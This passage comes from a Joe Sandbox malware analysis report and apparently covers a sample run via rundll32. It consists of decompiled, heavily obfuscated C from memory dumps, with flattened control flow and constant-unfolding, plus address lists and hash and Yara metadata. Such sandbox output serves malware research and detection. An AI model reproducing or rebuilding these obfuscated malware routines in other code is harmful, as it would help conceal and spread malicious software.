								if(_t178 > 0x39) {
									goto L10;
								}
							}
							_t189 = _t189 + 1;
							__eflags =  *_t189;
						}
						_t183 = 0x4a2a3c4;
						continue;
					} else {
						if(_t183 == 0x7562914) {
							_v144 = 0x80;
							_t178 = E002CCD29(_v164,  &_v144, _v176,  &_v128);
							_t220 =  &(_t220[3]);
							_t183 = 0x640e5f9;
							continue;
						} else {
							if(_t183 == 0xf669bfa) {
								_t183 = 0x7562914;
								continue;
							}
						}
					}
					L18:
					__eflags = _t183 - 0x1718ff4;
					if(__eflags != 0) {
						continue;
					}
					return _t178;
				}
				_push(_v172);
				_push(_v156);
				_push(_v204);
				_t174 = E002D8606(_v148, 0x2c1690, __eflags);
				E002C2206( &_v128, _t209, _v196, _v200, _t174, E002CEE81(__eflags), _v184);
				_t178 = E002CA8B0(_v160, _t174, _v152);
				_t220 =  &(_t220[0xb]);
				_t183 = 0x1718ff4;
				goto L18;
			}





































                                                                                                                                    0x002d000b
                                                                                                                                    0x002d0012
                                                                                                                                    0x002d0014
                                                                                                                                    0x002d0015
                                                                                                                                    0x002d0016
                                                                                                                                    0x002d001b
                                                                                                                                    0x002d0020
                                                                                                                                    0x002d0023
                                                                                                                                    0x002d002d
                                                                                                                                    0x002d0035
                                                                                                                                    0x002d003a
                                                                                                                                    0x002d0042
                                                                                                                                    0x002d0047
                                                                                                                                    0x002d004f
                                                                                                                                    0x002d0057
                                                                                                                                    0x002d0065
                                                                                                                                    0x002d006a
                                                                                                                                    0x002d0070
                                                                                                                                    0x002d0078
                                                                                                                                    0x002d0080
                                                                                                                                    0x002d0085
                                                                                                                                    0x002d008d
                                                                                                                                    0x002d0095
                                                                                                                                    0x002d009d
                                                                                                                                    0x002d00a5
                                                                                                                                    0x002d00ad
                                                                                                                                    0x002d00b5
                                                                                                                                    0x002d00bd
                                                                                                                                    0x002d00c5
                                                                                                                                    0x002d00cd
                                                                                                                                    0x002d00d5
                                                                                                                                    0x002d00e2
                                                                                                                                    0x002d00e5
                                                                                                                                    0x002d00e9
                                                                                                                                    0x002d00f1
                                                                                                                                    0x002d00f9
                                                                                                                                    0x002d0109
                                                                                                                                    0x002d010d
                                                                                                                                    0x002d0115
                                                                                                                                    0x002d011d
                                                                                                                                    0x002d0129
                                                                                                                                    0x002d012e
                                                                                                                                    0x002d0134
                                                                                                                                    0x002d013c
                                                                                                                                    0x002d0144
                                                                                                                                    0x002d014c
                                                                                                                                    0x002d0151
                                                                                                                                    0x002d0159
                                                                                                                                    0x002d0166
                                                                                                                                    0x002d0167
                                                                                                                                    0x002d016b
                                                                                                                                    0x002d0173
                                                                                                                                    0x002d017b
                                                                                                                                    0x002d0189
                                                                                                                                    0x002d018d
                                                                                                                                    0x002d0195
                                                                                                                                    0x002d019f
                                                                                                                                    0x002d01ad
                                                                                                                                    0x002d01b2
                                                                                                                                    0x002d01c1
                                                                                                                                    0x002d01c6
                                                                                                                                    0x002d01d5
                                                                                                                                    0x002d01d8
                                                                                                                                    0x002d01dc
                                                                                                                                    0x002d01e4
                                                                                                                                    0x002d01f1
                                                                                                                                    0x002d01f5
                                                                                                                                    0x002d01fd
                                                                                                                                    0x002d0205
                                                                                                                                    0x002d020d
                                                                                                                                    0x002d0212
                                                                                                                                    0x002d021a
                                                                                                                                    0x002d0227
                                                                                                                                    0x002d022b
                                                                                                                                    0x002d0233
                                                                                                                                    0x002d023d
                                                                                                                                    0x002d0280
                                                                                                                                    0x002d0285
                                                                                                                                    0x002d0289
                                                                                                                                    0x002d028b
                                                                                                                                    0x002d028d
                                                                                                                                    0x002d028f
                                                                                                                                    0x002d0295
                                                                                                                                    0x002d0295
                                                                                                                                    0x002d0297
                                                                                                                                    0x002d029d
                                                                                                                                    0x002d029d
                                                                                                                                    0x002d029f
                                                                                                                                    0x002d02a5
                                                                                                                                    0x002d02a5
                                                                                                                                    0x002d02a1
                                                                                                                                    0x002d02a1
                                                                                                                                    0x002d02a3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d02a3
                                                                                                                                    0x002d0299
                                                                                                                                    0x002d0299
                                                                                                                                    0x002d029b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d029b
                                                                                                                                    0x002d0291
                                                                                                                                    0x002d0291
                                                                                                                                    0x002d0293
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0293
                                                                                                                                    0x002d02a8
                                                                                                                                    0x002d02a9
                                                                                                                                    0x002d02a9
                                                                                                                                    0x002d02ae
                                                                                                                                    0x00000000
                                                                                                                                    0x002d023f
                                                                                                                                    0x002d0241
                                                                                                                                    0x002d0257
                                                                                                                                    0x002d0271
                                                                                                                                    0x002d0276
                                                                                                                                    0x002d0279
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0243
                                                                                                                                    0x002d0249
                                                                                                                                    0x002d024f
                                                                                                                                    0x00000000
                                                                                                                                    0x002d024f
                                                                                                                                    0x002d0249
                                                                                                                                    0x002d0241
                                                                                                                                    0x002d030f
                                                                                                                                    0x002d030f
                                                                                                                                    0x002d0315
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0325
                                                                                                                                    0x002d0325
                                                                                                                                    0x002d02b2
                                                                                                                                    0x002d02bb
                                                                                                                                    0x002d02bf
                                                                                                                                    0x002d02c7
                                                                                                                                    0x002d02f3
                                                                                                                                    0x002d0302
                                                                                                                                    0x002d0307
                                                                                                                                    0x002d030a
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                                    • API String ID: 0-3810143839
                                                                                                                                    • Opcode ID: 44ed16efca3cd1fdb597acf1eb2086d778758eb945c24923646fdcde01886ed2
                                                                                                                                    • Instruction ID: 9c40d31c8dcf407a8607ffd40f8ef61b42455fc149a0cebf2384003257bec237
                                                                                                                                    • Opcode Fuzzy Hash: 44ed16efca3cd1fdb597acf1eb2086d778758eb945c24923646fdcde01886ed2
                                                                                                                                    • Instruction Fuzzy Hash: D681B6B151A3419BD3A8CF26D588A1BBBE2FBC5718F005A1EF4C586260D3B4C949CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C7735 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002C7735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ecx;
				void* _t163;
				signed int _t176;
				void* _t188;
				signed int _t205;
				signed int* _t207;
				void* _t209;
				void* _t210;

				_t186 = _a4;
				_t207 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t207);
				_push(_a4);
				_push(__edx);
				E002D20B9(_t163);
				_v60 = 0x524796;
				_t210 = _t209 + 0x18;
				asm("stosd");
				_t188 = 0x9c25eae;
				asm("stosd");
				asm("stosd");
				_v76 = 0x29f01;
				_v76 = _v76 | 0x94be009d;
				_v76 = _v76 ^ 0x94be9f9d;
				_v108 = 0xafa956;
				_v108 = _v108 + 0x628;
				_v108 = _v108 ^ 0xf539d3de;
				_v108 = _v108 ^ 0xf5927b2e;
				_v92 = 0x300c11;
				_v92 = _v92 ^ 0x95f7d427;
				_v92 = _v92 ^ 0x95c19bc8;
				_v116 = 0x7fd72e;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 + 0x5d9b;
				_v116 = _v116 ^ 0x0001fda4;
				_v88 = 0x25a82f;
				_t205 = 0x1b;
				_v88 = _v88 * 0x72;
				_v88 = _v88 ^ 0x10cad58f;
				_v100 = 0xf91ce5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x71d91e41;
				_v100 = _v100 ^ 0x71d9c87d;
				_v136 = 0x5a524;
				_v136 = _v136 ^ 0x65d544fc;
				_v136 = _v136 / _t205;
				_v136 = _v136 + 0xdad4;
				_v136 = _v136 ^ 0x03c43220;
				_v68 = 0xd5537a;
				_v68 = _v68 + 0xffffd52f;
				_v68 = _v68 ^ 0x00d2b66c;
				_v128 = 0x59397b;
				_v128 = _v128 ^ 0x5dfc0cc3;
				_v128 = _v128 + 0x56f6;
				_v128 = _v128 + 0xff83;
				_v128 = _v128 ^ 0x5dafd3d4;
				_v104 = 0x85edfa;
				_v104 = _v104 | 0x32b3baf7;
				_v104 = _v104 ^ 0x32b12396;
				_v112 = 0x4c4fc6;
				_v112 = _v112 + 0xbf9f;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x002f2047;
				_v120 = 0xc21a43;
				_v120 = _v120 | 0x0781619f;
				_v120 = _v120 ^ 0x30a197e6;
				_v120 = _v120 ^ 0x376a3e6d;
				_v84 = 0xaf6a80;
				_v84 = _v84 + 0xffff12f3;
				_v84 = _v84 ^ 0x00ae6f5f;
				_v64 = 0x7bdfb0;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x00114c08;
				_v96 = 0x6b35de;
				_v96 = _v96 * 0x60;
				_v96 = _v96 ^ 0x283b6418;
				_v124 = 0x52b9d2;
				_v124 = _v124 | 0x40c5122c;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0001910d;
				_v132 = 0x44d0f9;
				_v132 = _v132 * 0x29;
				_v132 = _v132 + 0xf17;
				_v132 = _v132 * 0x65;
				_v132 = _v132 ^ 0x592f3fb2;
				_v72 = 0xc75ad6;
				_v72 = _v72 ^ 0xe0bef3a1;
				_v72 = _v72 ^ 0xe072572c;
				_v80 = 0xa6c1d6;
				_v80 = _v80 + 0xc8d;
				_v80 = _v80 ^ 0x00ac29a9;
				do {
					while(_t188 != 0xe27b71) {
						if(_t188 == 0x372e88b) {
							_push(_t188);
							_push(_t188);
							_t176 = E002C7FF2(_t207[1]);
							 *_t207 = _t176;
							__eflags = _t176;
							if(__eflags != 0) {
								_t188 = 0xe27b71;
								continue;
							}
						} else {
							if(_t188 == 0x93f98fe) {
								_t207[1] = E002E0C14(_t186);
								_t188 = 0x372e88b;
								continue;
							} else {
								if(_t188 == 0x9c25eae) {
									_t188 = 0x93f98fe;
									 *_t207 =  *_t207 & 0x00000000;
									_t207[1] = _v76;
									continue;
								} else {
									if(_t188 == 0xa0c9f29) {
										_t146 =  &_v112; // 0x2f2047
										E002D0DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
										_t210 = _t210 + 0x10;
										_t188 = 0xc7f60b3;
										continue;
									} else {
										if(_t188 == 0xc7f60b3) {
											_t144 =  &_v84; // 0xe072572c
											E002E0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
											_t210 = _t210 + 0x10;
											_t188 = 0xcf8cba1;
											continue;
										} else {
											_t219 = _t188 - 0xcf8cba1;
											if(_t188 != 0xcf8cba1) {
												goto L17;
											} else {
												E002E0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t207 != 0x00000000;
					}
					E002C3DBC( &_v44, _t207, _v88, _v100, _v136);
					_t210 = _t210 + 0xc;
					_t188 = 0xa0c9f29;
					L17:
					__eflags = _t188 - 0x560a718;
				} while (__eflags != 0);
				goto L9;
			}

































                                                                                                                                    0x002c773c
                                                                                                                                    0x002c7745
                                                                                                                                    0x002c774d
                                                                                                                                    0x002c7754
                                                                                                                                    0x002c775b
                                                                                                                                    0x002c775c
                                                                                                                                    0x002c775d
                                                                                                                                    0x002c775f
                                                                                                                                    0x002c7764
                                                                                                                                    0x002c7772
                                                                                                                                    0x002c7775
                                                                                                                                    0x002c7778
                                                                                                                                    0x002c777f
                                                                                                                                    0x002c7780
                                                                                                                                    0x002c7781
                                                                                                                                    0x002c7789
                                                                                                                                    0x002c7791
                                                                                                                                    0x002c7799
                                                                                                                                    0x002c77a1
                                                                                                                                    0x002c77a9
                                                                                                                                    0x002c77b1
                                                                                                                                    0x002c77b9
                                                                                                                                    0x002c77c1
                                                                                                                                    0x002c77c9
                                                                                                                                    0x002c77d1
                                                                                                                                    0x002c77d9
                                                                                                                                    0x002c77de
                                                                                                                                    0x002c77e6
                                                                                                                                    0x002c77ee
                                                                                                                                    0x002c77fb
                                                                                                                                    0x002c77fc
                                                                                                                                    0x002c7800
                                                                                                                                    0x002c7808
                                                                                                                                    0x002c7810
                                                                                                                                    0x002c7815
                                                                                                                                    0x002c781d
                                                                                                                                    0x002c7825
                                                                                                                                    0x002c782d
                                                                                                                                    0x002c783b
                                                                                                                                    0x002c783f
                                                                                                                                    0x002c7847
                                                                                                                                    0x002c784f
                                                                                                                                    0x002c7857
                                                                                                                                    0x002c785f
                                                                                                                                    0x002c7867
                                                                                                                                    0x002c786f
                                                                                                                                    0x002c7877
                                                                                                                                    0x002c787f
                                                                                                                                    0x002c7887
                                                                                                                                    0x002c788f
                                                                                                                                    0x002c7897
                                                                                                                                    0x002c789f
                                                                                                                                    0x002c78a7
                                                                                                                                    0x002c78af
                                                                                                                                    0x002c78b7
                                                                                                                                    0x002c78bb
                                                                                                                                    0x002c78c3
                                                                                                                                    0x002c78cb
                                                                                                                                    0x002c78d3
                                                                                                                                    0x002c78db
                                                                                                                                    0x002c78e3
                                                                                                                                    0x002c78eb
                                                                                                                                    0x002c78f3
                                                                                                                                    0x002c78fb
                                                                                                                                    0x002c7903
                                                                                                                                    0x002c7908
                                                                                                                                    0x002c7910
                                                                                                                                    0x002c791d
                                                                                                                                    0x002c7921
                                                                                                                                    0x002c792e
                                                                                                                                    0x002c793b
                                                                                                                                    0x002c7943
                                                                                                                                    0x002c7948
                                                                                                                                    0x002c794d
                                                                                                                                    0x002c7955
                                                                                                                                    0x002c7962
                                                                                                                                    0x002c7966
                                                                                                                                    0x002c7973
                                                                                                                                    0x002c7977
                                                                                                                                    0x002c797f
                                                                                                                                    0x002c7987
                                                                                                                                    0x002c798f
                                                                                                                                    0x002c7997
                                                                                                                                    0x002c799f
                                                                                                                                    0x002c79a7
                                                                                                                                    0x002c79af
                                                                                                                                    0x002c79af
                                                                                                                                    0x002c79bd
                                                                                                                                    0x002c7aac
                                                                                                                                    0x002c7aad
                                                                                                                                    0x002c7aae
                                                                                                                                    0x002c7ab3
                                                                                                                                    0x002c7ab7
                                                                                                                                    0x002c7ab9
                                                                                                                                    0x002c7abf
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7abf
                                                                                                                                    0x002c79c3
                                                                                                                                    0x002c79c5
                                                                                                                                    0x002c7a90
                                                                                                                                    0x002c7a93
                                                                                                                                    0x00000000
                                                                                                                                    0x002c79cb
                                                                                                                                    0x002c79d1
                                                                                                                                    0x002c7a7c
                                                                                                                                    0x002c7a7e
                                                                                                                                    0x002c7a81
                                                                                                                                    0x00000000
                                                                                                                                    0x002c79d7
                                                                                                                                    0x002c79dd
                                                                                                                                    0x002c7a4f
                                                                                                                                    0x002c7a66
                                                                                                                                    0x002c7a6b
                                                                                                                                    0x002c7a6e
                                                                                                                                    0x00000000
                                                                                                                                    0x002c79df
                                                                                                                                    0x002c79e5
                                                                                                                                    0x002c7a35
                                                                                                                                    0x002c7a3d
                                                                                                                                    0x002c7a42
                                                                                                                                    0x002c7a45
                                                                                                                                    0x00000000
                                                                                                                                    0x002c79e7
                                                                                                                                    0x002c79e7
                                                                                                                                    0x002c79ed
                                                                                                                                    0x00000000
                                                                                                                                    0x002c79f3
                                                                                                                                    0x002c7a0b
                                                                                                                                    0x002c7a10
                                                                                                                                    0x002c79ed
                                                                                                                                    0x002c79e5
                                                                                                                                    0x002c79dd
                                                                                                                                    0x002c79d1
                                                                                                                                    0x002c79c5
                                                                                                                                    0x002c7a13
                                                                                                                                    0x002c7a24
                                                                                                                                    0x002c7a24
                                                                                                                                    0x002c7ad8
                                                                                                                                    0x002c7add
                                                                                                                                    0x002c7ae0
                                                                                                                                    0x002c7ae5
                                                                                                                                    0x002c7ae5
                                                                                                                                    0x002c7ae5
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                                    • API String ID: 0-2956538602
                                                                                                                                    • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                    • Instruction ID: 581fe68a8cdd3c3a263ccf5366634a4668532d569cde9211f3686db40d3f006e
                                                                                                                                    • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                    • Instruction Fuzzy Hash: 9B913E710193419FD368CF65D986A2BBBF1FBC4718F109A1CF29296220D3B5CA598F43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C4816 Relevance: 6.4, Strings: 5, Instructions: 180COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E002C4816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t164;
				void* _t179;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t196;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a16);
				_t213 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t164);
				_v4 = _v4 & 0x00000000;
				_t217 =  &(( &_v88)[6]);
				_v16 = 0xc0a747;
				_v12 = 0xade381;
				_t214 = 0;
				_v8 = 0x11050f;
				_t196 = 0x5adc597;
				_v84 = 0xdf9e69;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff5795;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x0001b9f8;
				_v68 = 0xf2d8cd;
				_v68 = _v68 << 6;
				_v68 = _v68 | 0xe3b79c6a;
				_v68 = _v68 + 0xec5a;
				_v68 = _v68 ^ 0xffb8abc5;
				_v40 = 0x5d8c34;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x40002ec6;
				_v28 = 0x37ca39;
				_v28 = _v28 | 0x456668c2;
				_v28 = _v28 ^ 0x0577eafb;
				_v80 = 0xd16358;
				_v80 = _v80 ^ 0xe637ce9d;
				_t190 = 0x68;
				_v80 = _v80 * 0x4b;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x965c2e63;
				_v56 = 0xfc1806;
				_v56 = _v56 + 0xffffb57d;
				_v56 = _v56 | 0x299c1b97;
				_v56 = _v56 ^ 0x29fc2736;
				_v44 = 0x81586;
				_v44 = _v44 | 0xba5390c4;
				_v44 = _v44 ^ 0xba584850;
				_v60 = 0x52e6aa;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 * 0x28;
				_v60 = _v60 ^ 0x00066c4e;
				_v48 = 0x7a334;
				_v48 = _v48 + 0xfffff5af;
				_v48 = _v48 ^ 0x0009652d;
				_v52 = 0x3bf8e8;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x00025bcb;
				_v64 = 0xacc490;
				_t191 = 0x6f;
				_v64 = _v64 / _t191;
				_v64 = _v64 ^ 0xce7acdce;
				_v64 = _v64 ^ 0xce756fa5;
				_v88 = 0x557b83;
				_v88 = _v88 ^ 0xfc4fd146;
				_v88 = _v88 ^ 0x87bb4e9a;
				_v88 = _v88 ^ 0x18fbc6ce;
				_v88 = _v88 ^ 0x635c68ef;
				_v24 = 0xa24557;
				_t192 = 0x23;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00019ec3;
				_v72 = 0x274d3f;
				_v72 = _v72 + 0x3236;
				_v72 = _v72 + 0x71a1;
				_v72 = _v72 + 0x1749;
				_v72 = _v72 ^ 0x0028bc49;
				_v32 = 0x96c762;
				_t193 = 0x44;
				_v32 = _v32 / _t193;
				_v32 = _v32 ^ 0x000b5918;
				_v76 = 0x2f082c;
				_v76 = _v76 + 0x52f3;
				_v76 = _v76 + 0x7ae4;
				_v76 = _v76 ^ 0x81d2744f;
				_v76 = _v76 ^ 0x81f68fa5;
				_v36 = 0x9357ce;
				_v36 = _v36 + 0xfffffb26;
				_v36 = _v36 ^ 0x009b03e6;
				do {
					while(_t196 != 0x4d42949) {
						if(_t196 == 0x5adc597) {
							_t196 = 0x4d42949;
							continue;
						} else {
							if(_t196 == 0x78e32ab) {
								E002D847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
							} else {
								if(_t196 != 0xf2775cd) {
									goto L11;
								} else {
									_push(_t196);
									_push(_t196);
									_t214 = E002C7FF2(_v20 + _v20);
									if(_t214 != 0) {
										_t196 = 0x78e32ab;
										continue;
									}
								}
							}
						}
						L14:
						return _t214;
					}
					_t179 = E002D847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
					_t217 =  &(_t217[8]);
					if(_t179 == 0) {
						_t196 = 0xc32537b;
						goto L11;
					} else {
						_t196 = 0xf2775cd;
						continue;
					}
					goto L14;
					L11:
				} while (_t196 != 0xc32537b);
				goto L14;
			}



































                                                                                                                                    0x002c481d
                                                                                                                                    0x002c4821
                                                                                                                                    0x002c4823
                                                                                                                                    0x002c4827
                                                                                                                                    0x002c482b
                                                                                                                                    0x002c482f
                                                                                                                                    0x002c4830
                                                                                                                                    0x002c4831
                                                                                                                                    0x002c4836
                                                                                                                                    0x002c483b
                                                                                                                                    0x002c483e
                                                                                                                                    0x002c4848
                                                                                                                                    0x002c4850
                                                                                                                                    0x002c4852
                                                                                                                                    0x002c485a
                                                                                                                                    0x002c485f
                                                                                                                                    0x002c4867
                                                                                                                                    0x002c486c
                                                                                                                                    0x002c4874
                                                                                                                                    0x002c4879
                                                                                                                                    0x002c4881
                                                                                                                                    0x002c4889
                                                                                                                                    0x002c488e
                                                                                                                                    0x002c4896
                                                                                                                                    0x002c489e
                                                                                                                                    0x002c48a6
                                                                                                                                    0x002c48ae
                                                                                                                                    0x002c48b3
                                                                                                                                    0x002c48bb
                                                                                                                                    0x002c48c3
                                                                                                                                    0x002c48cb
                                                                                                                                    0x002c48d3
                                                                                                                                    0x002c48db
                                                                                                                                    0x002c48ea
                                                                                                                                    0x002c48ed
                                                                                                                                    0x002c48f1
                                                                                                                                    0x002c48f6
                                                                                                                                    0x002c48fe
                                                                                                                                    0x002c4906
                                                                                                                                    0x002c490e
                                                                                                                                    0x002c4916
                                                                                                                                    0x002c491e
                                                                                                                                    0x002c4926
                                                                                                                                    0x002c492e
                                                                                                                                    0x002c4936
                                                                                                                                    0x002c493e
                                                                                                                                    0x002c4948
                                                                                                                                    0x002c494c
                                                                                                                                    0x002c4954
                                                                                                                                    0x002c495c
                                                                                                                                    0x002c4964
                                                                                                                                    0x002c496c
                                                                                                                                    0x002c497c
                                                                                                                                    0x002c4980
                                                                                                                                    0x002c4988
                                                                                                                                    0x002c4994
                                                                                                                                    0x002c4997
                                                                                                                                    0x002c499b
                                                                                                                                    0x002c49a3
                                                                                                                                    0x002c49ab
                                                                                                                                    0x002c49b3
                                                                                                                                    0x002c49bb
                                                                                                                                    0x002c49c3
                                                                                                                                    0x002c49cb
                                                                                                                                    0x002c49d5
                                                                                                                                    0x002c49e3
                                                                                                                                    0x002c49e8
                                                                                                                                    0x002c49ee
                                                                                                                                    0x002c49fb
                                                                                                                                    0x002c4a03
                                                                                                                                    0x002c4a0b
                                                                                                                                    0x002c4a13
                                                                                                                                    0x002c4a1b
                                                                                                                                    0x002c4a23
                                                                                                                                    0x002c4a2f
                                                                                                                                    0x002c4a37
                                                                                                                                    0x002c4a3b
                                                                                                                                    0x002c4a43
                                                                                                                                    0x002c4a4b
                                                                                                                                    0x002c4a53
                                                                                                                                    0x002c4a5b
                                                                                                                                    0x002c4a63
                                                                                                                                    0x002c4a6b
                                                                                                                                    0x002c4a73
                                                                                                                                    0x002c4a7b
                                                                                                                                    0x002c4a83
                                                                                                                                    0x002c4a83
                                                                                                                                    0x002c4a8d
                                                                                                                                    0x002c4ac9
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4a8f
                                                                                                                                    0x002c4a91
                                                                                                                                    0x002c4b4f
                                                                                                                                    0x002c4a97
                                                                                                                                    0x002c4a9d
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4a9f
                                                                                                                                    0x002c4aaf
                                                                                                                                    0x002c4ab0
                                                                                                                                    0x002c4ab9
                                                                                                                                    0x002c4abf
                                                                                                                                    0x002c4ac5
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4ac5
                                                                                                                                    0x002c4abf
                                                                                                                                    0x002c4a9d
                                                                                                                                    0x002c4a91
                                                                                                                                    0x002c4b58
                                                                                                                                    0x002c4b60
                                                                                                                                    0x002c4b60
                                                                                                                                    0x002c4afa
                                                                                                                                    0x002c4aff
                                                                                                                                    0x002c4b04
                                                                                                                                    0x002c4b10
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4b06
                                                                                                                                    0x002c4b06
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4b06
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4b15
                                                                                                                                    0x002c4b15
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: -e$62$?M'$h\c$z
                                                                                                                                    • API String ID: 0-1842174784
                                                                                                                                    • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                    • Instruction ID: e0d8a07c194743945054be049672d304be3f7c8b54c72e45e9b7c574d97795d8
                                                                                                                                    • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                    • Instruction Fuzzy Hash: C3812F715193819FD368CF61C99991FBBF1FBD9758F408A0CF29586260D3B6CA188F42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DBE27 Relevance: 6.4, Strings: 5, Instructions: 130COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002DBE27(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v320;
				char _t133;
				signed int _t136;
				void* _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				char* _t144;
				intOrPtr* _t163;
				void* _t164;

				_v40 = 0x365269;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00099806;
				_v16 = 0x620947;
				_v16 = _v16 + 0x25da;
				_v16 = _v16 | 0xf0dff1a3;
				_v16 = _v16 + 0xffff8fd5;
				_v16 = _v16 ^ 0xf0f65193;
				_v60 = 0x4a6911;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0015bfec;
